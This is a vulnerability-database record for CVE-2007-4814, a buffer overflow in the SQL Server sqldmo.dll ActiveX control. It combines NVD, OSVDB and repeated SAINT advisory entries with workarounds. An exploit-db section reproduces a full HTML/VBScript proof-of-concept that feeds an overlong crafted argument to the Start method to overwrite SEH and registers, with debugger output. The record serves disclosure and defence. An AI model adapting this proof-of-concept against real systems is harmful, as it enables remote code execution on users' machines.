ID: CVE-2007-4814
Type: cve
Reporter: NVD
Modified: 2018-10-15T17:38:15
Description
Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method.
{"osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Vulnerability Description\nA buffer overflow exists in the Distributed Management Objects OLE DLL (sqldmo.dll). The ActiveX control fails to provide proper bounds checking on arguments to the Start method resulting in a heap overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): \n\nUse a browser that does not support ActiveX controls.\n\nDisable ActiveX controls in IE\n## Short Description\nA buffer overflow exists in the Distributed Management Objects OLE DLL (sqldmo.dll). The ActiveX control fails to provide proper bounds checking on arguments to the Start method resulting in a heap overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nOther Advisory URL: http://retrogod.altervista.org/microsoft_sqldmo.html\nOther Advisory URL: http://securityreason.com/securityalert/3112\nISS X-Force ID: 36509\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4379\n[CVE-2007-4814](https://vulners.com/cve/CVE-2007-4814)\nBugtraq ID: 25594\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38399", "id": "OSVDB:38399", "title": "Microsoft SQL Server Enterprise Manager Distributed Management Objects OLE DLL ActiveX (sqldmo.dll) Start Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "id": "SAINT:61E475396C30E19A42CCA76357EBA661", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "type": "saint", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "id": "SAINT:98A0191E52B53F3C0CE52F6F1308C175", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:14", "bulletinFamily": "exploit", "description": "Added: 10/11/2007 \nCVE: [CVE-2007-4814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814>) \nBID: [25594](<http://www.securityfocus.com/bid/25594>) \nOSVDB: [38399](<http://www.osvdb.org/38399>) \n\n\n### Background\n\nMicrosoft SQL Server includes a Distributed Management Object model which offers a modern, object-oriented alternative to using stored procedures. The Distributed Management Object model is implemented by the `**sqldmo.dll**` ActiveX control. \n\n### Problem\n\nA buffer overflow vulnerability in the `**sqldmo.dll**` ActiveX control allows command execution when a user opens a web page which calls the Start method with a long, specially crafted argument. \n\n### Resolution\n\nSet the kill bit for Class ID 10020200-E260-11CF-AE68-00AA004A34D5 as described in [Microsoft Knowledge Base Article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/478822> \n\n\n### Limitations\n\nExploit works on Microsoft SQL Server 2005 SP2 on Windows 2000 and requires a user to open the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2007-10-11T00:00:00", "published": "2007-10-11T00:00:00", "id": "SAINT:F28B5A24E1F8C3D543C46473D3D45AB8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_sql_server_dmo", "title": "Microsoft SQL Server Distributed Management Objects buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:47:38", "bulletinFamily": "exploit", "description": "Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF. CVE-2007-4814. Dos exploit for windows platform", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "EDB-ID:4379", "href": "https://www.exploit-db.com/exploits/4379/", "type": "exploitdb", "title": "Microsoft SQL Server Distributed Management Objects sqldmo.dll BoF", "sourceData": "<!--\n18.48 01/09/2007\nMicrosoft SQL Server Distributed Management Objects OLE DLL for\nSQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc\n\nfile version: 2000.085.2004.00\nproduct version: 8.05.2004\n\npassing some fuzzy chars to Start method:\n\nEAX 00000000\nECX 00620062\nEDX 00620062\nEBX 1C3A3638 SQLDMO.1C3A3638\nESP 0013D87C\nEBP 0013DAA8\nESI 03042544\nEDI 0013DAA0 ASCII \"|T\"\nEIP 1C1C9800 SQLDMO.1C1C9800\n\n...\n1C1C97EA 8D8D E4FDFFFF LEA ECX,DWORD PTR SS:[EBP-21C]\n1C1C97F0 51 PUSH ECX\n1C1C97F1 8B95 E0FDFFFF MOV EDX,DWORD PTR SS:[EBP-220]\n1C1C97F7 8B02 MOV EAX,DWORD PTR DS:[EDX]\n1C1C97F9 8B8D E0FDFFFF MOV ECX,DWORD PTR SS:[EBP-220]\n1C1C97FF 51 PUSH ECX\n1C1C9800 FF90 DC010000 CALL DWORD PTR DS:[EAX+1DC] <--- exception\naccess violation when reading 000001DC\n\nby manipulating edx you have the first exploitable condition...\n\n\nalso seh is overwritten, then:\n\nEAX 00000000\nECX 00610061\nEDX 7C9137D8 ntdll.7C9137D8\nEBX 00000000\nESP 0013D4AC\nEBP 0013D4CC\nESI 00000000\nEDI 00000000\nEIP 00610061\n\nobject safety report:\nRegKey Safe for Script: False\nRegKey Safe for Init: False\nImplements IObjectSafety: True\n\nmeans: works according to security settings for the Internet zone\nneeds Activex \"not marked as safe\" option set to \"ask\" or \"enabled\" (not the predefined one)\n\nrgod.\nhttp://retrogod.altervista.org\n-->\n<html>\n<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>\n<script language='vbscript'>\n\ntargetFile = \"C:\\Programmi\\Microsoft SQL Server\\80\\Tools\\Binn\\sqldmo.dll\"\nprototype = \"Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )\"\nmemberName = \"Start\"\nprogid = \"SQLDMO.SQLServer\"\nargCount = 4\n\n'edx = ecx\nedx =\"bb\"\nseh =\"aa\"\nStartMode =True\nServer =\"http://ZZZZ\\YYYY\\XXXX\\WW?W\\VVVV\\AAAA\\AAA\\AAAAA\\AAAA\\AA@AA\\tes\\test\\test\\tes.\\ttest\\MMMM\\LLLL\\KKK\\JJJJ\\IIII\\HH.H\\GGGGG\\FFFF\\EEEE\\DDD\\CCCC\\BBBB\\AAA\\A\\\\\\\\\\\\\\\\\\:#$%AAAA\\BBBB\\CCCC\\DD?D\\EEEE\\FFFF\\GGG\\\\:#$%\\HHHHH\\IIII\\te@st\\tes\\test\\test\\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa\" + seh + \"CCDmmm\" + edx + \"nnnBBBB\\AAAA\\ZZZ\\Z\\\\\\\\\\\\\\\\\\:#$%YYYY\\XXXX\\WWWW\\VV?V\\UUUU\\TTTT\\SSS\\\\:#$%\\RRRRR\\QQQQ\\PP@PP\\OOO\\NNNN\\MMMM\\LLL.\\KKKKK\\JJJJ\\IIII\\HHH\\GGGG\\FFFF\\EE.E\\DDDDD\\CCCC\\BBBB\\AAA\\AAAA\\AAAA\\AAA\\A\\\\\\\\\\\\\\\\\\:#$%AAAA\\AAAA\\AAAA\\AA?A\\wwww\\vvvv\\uuu\\\\:#$%\\ttttt\\ssss\\rr@rr\\qqq\\pppp\\oooo\\nnn.\\mmmmm\\llll\\kkkk\\jjj\\iiii\\hhhh\\gg.g\\fffff\\eeee\\dddd\\ccc\\bbbb\\aaaa\\AAA\\A\\\\\\\\\\\\\\"\nLogin =\"aaaaaaaa\"\nPassword =\"bbbbbbbb\"\n\nSQLServer.Start StartMode ,Server ,Login ,Password\n\n</script>\n</html>\n\n# milw0rm.com [2007-09-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4379/"}]}